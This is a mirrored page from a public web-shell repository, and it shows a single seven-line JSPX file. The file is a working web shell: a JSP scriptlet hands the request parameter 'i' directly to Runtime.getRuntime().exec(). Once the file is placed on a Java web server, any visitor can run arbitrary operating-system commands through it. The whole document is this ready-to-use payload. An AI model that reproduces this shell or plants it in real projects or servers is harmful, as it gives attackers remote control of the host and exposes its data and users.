mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
7 lines
239 B
Plaintext
7 lines
239 B
Plaintext
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
|
|
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" />
|
|
<jsp:scriptlet>
|
|
Runtime.getRuntime().exec(request.getParameter("i"));
|
|
</jsp:scriptlet>
|
|
</jsp:root>
|